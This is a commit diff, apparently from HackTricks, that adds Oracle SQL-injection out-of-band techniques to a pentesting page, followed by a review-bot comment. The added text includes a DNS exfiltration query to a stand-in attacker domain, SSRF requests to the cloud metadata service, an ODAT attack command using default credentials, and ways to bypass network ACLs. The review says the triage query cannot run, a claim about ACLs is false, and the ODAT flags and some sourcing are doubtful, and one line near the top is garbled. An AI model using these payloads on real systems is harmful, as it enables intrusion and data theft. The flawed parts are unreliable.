Add content from: Research Update: Enhanced src/pentesting-web/sql-injection/o...

This commit is contained in:
HackTricks News Bot 2025-08-05 16:24:44 +00:00
parent 0f0e4e0900
commit 1a50bdc177


@ -156,9 +156,99 @@ select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
A `ORA-12541: TNS:no listener` or a `TNS:operation timed out` is a sign that the TCP port is closed, whereas a `ORA-29263: HTTP protocol error` or data is a sign that the port is open.
Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)
```
SELECT HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() FROM dual;
```
---
## Additional Packages & Techniques (Oracle 19c → 23c)
### UTL_INADDR DNS-based exfiltration and host discovery
`UTL_INADDR` exposes simple name-resolution helpers that trigger an outbound DNS lookup from the database host. Because only a domain is required (no port/ACL needed) it is a reliable primitive for blind-exfil when other network callouts are blocked.
```sql
-- Leak the DB name and current user via a DNS query handled by Burp Collaborator
SELECT UTL_INADDR.get_host_address(
(SELECT name FROM v$database)||'.'||(SELECT user FROM dual)||
'.attacker.oob.server') FROM dual;
```
`get_host_address()` returns the resolved IP (or raises `ORA-29257` if resolution fails). The attacker only needs to watch for the incoming DNS request on the controlled domain to confirm code execution.
### DBMS_CLOUD.SEND_REQUEST full HTTP client on Autonomous/23c
Recent cloud-centric editions (Autonomous Database, 21c/23c, 23ai) ship with `DBMS_CLOUD`. The `SEND_REQUEST` function acts as a general-purpose HTTP client that supports custom verbs, headers, TLS and large bodies, making it far more powerful than the classical `UTL_HTTP`.
```sql
-- Assuming the current user has CREATE CREDENTIAL and network ACL privileges
BEGIN
-- empty credential when no auth is required
DBMS_CLOUD.create_credential(
credential_name => 'NOAUTH',
username => 'ignored',
password => 'ignored');
END;
/
DECLARE
resp DBMS_CLOUD_TYPES.resp;
BEGIN
resp := DBMS_CLOUD.send_request(
credential_name => 'NOAUTH',
uri => 'http://169.254.169.254/latest/meta-data/',
method => 'GET',
timeout => 3);
dbms_output.put_line(DBMS_CLOUD.get_response_text(resp));
END;
/
```
Because `SEND_REQUEST` allows arbitrary target URIs it can be abused via SQLi for:
1. Internal port scanning / SSRF to cloud metadata services.
2. Out-of-band exfiltration over HTTPS (use Burp Collaborator or an `ngrok` tunnel).
3. Callbacks to attacker servers even when older callout packages are disabled by ACLs.
If you only have a classical on-prem 19c but can create Java stored procedures, you can sometimes install `DBMS_CLOUD` from the OCI client bundle — useful in some engagements.
### Automating the attack surface with **ODAT**
[ODAT Oracle Database Attacking Tool](https://github.com/quentinhardy/odat) has kept pace with modern releases (tested up to 19c, 5.1.1 Apr-2022). The `utl_http`, `utl_tcp`, `httpuritype` and newer `dbms_cloud` modules automatically:
* Detect usable callout packages/ACL grants.
* Trigger DNS & HTTP callbacks for blind extraction.
* Generate ready-to-copy SQL payloads for Burp/SQLMap.
Example: quick OOB check with default creds (takes care of ACL enumeration in the background):
```bash
odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules oob
```
### Recent network ACL restrictions & bypasses
Oracle tightened default Network ACLs in the July 2023 CPU — unprivileged accounts now receive `ORA-24247: network access denied by access control list` by default. Two patterns still allow callouts through SQLi:
1. Target account owns an ACL entry (`DBMS_NETWORK_ACL_ADMIN.create_acl`) that was added by a developer for integrations.
2. The attacker abuses a high-privilege PL/SQL definer-rights routine (e.g. in a custom application) that *already* has `AUTHID DEFINER` and the necessary grants.
If you encounter `ORA-24247` during exploitation always search for reusable procedures:
```sql
SELECT owner, object_name
FROM dba_objects
WHERE object_type = 'PROCEDURE'
AND authid = 'DEFINER';
```
(in many audits at least one reporting/export procedure had the needed rights).
---
## References
* Oracle Docs `DBMS_CLOUD.SEND_REQUEST` package description and examples.
* quentinhardy/odat Oracle Database Attacking Tool (latest release 5.1.1, Apr-2022).
{{#include ../../banners/hacktricks-training.md}}
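Review bot: the ORA-24247 triage query at the end of this hunk (`SELECT owner, object_name FROM dba_objects ... AND authid = 'DEFINER'`) cannot run as written, because `DBA_OBJECTS` has no `AUTHID` column and Oracle will reject it with ORA-00904; the `AUTHID` column lives in `DBA_PROCEDURES` / `ALL_PROCEDURES`, which also cover packages and functions and are readable from the low-privilege account an injection usually lands in, so something like `SELECT owner, object_name, procedure_name FROM all_procedures WHERE authid = 'DEFINER' AND owner NOT IN ('SYS','SYSTEM')` is what the text needs, together with a sentence saying a hit only helps when the current user has EXECUTE on it and the definer actually holds the ACL grant. Three further points in the same hunk: (1) the `UTL_INADDR` paragraph says "no port/ACL needed", but since 11g `UTL_INADDR` is governed by the same network ACLs under the `resolve` privilege, and the later section of this very hunk says unprivileged accounts get ORA-24247, so reword to "only the `resolve` ACL privilege is required, which is granted far more often than `connect`" rather than claiming no ACL is involved. (2) The statement that the July 2023 CPU tightened default ACLs is unsourced (the References list cites no CPU advisory), and network ACLs have denied callouts to accounts without an ACL grant since they were introduced in 11g; cite the advisory or reword. (3) The ODAT invocation `odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules oob` and the `dbms_cloud` module name do not match the ODAT project as I know it (its callout modules are `utlhttp`, `httpuritype` and `utltcp`, and `all` has no `--modules` switch), so please verify against `odat all -h` before merging; likewise source or drop the sentence about installing `DBMS_CLOUD` on on-prem 19c "from the OCI client bundle" via Java stored procedures, which the References do not support. Minor: the `DBMS_CLOUD` block returns its result only through `dbms_output`, which an injection point never shows, so say how the response is meant to be read back in the SQLi scenario the section is about.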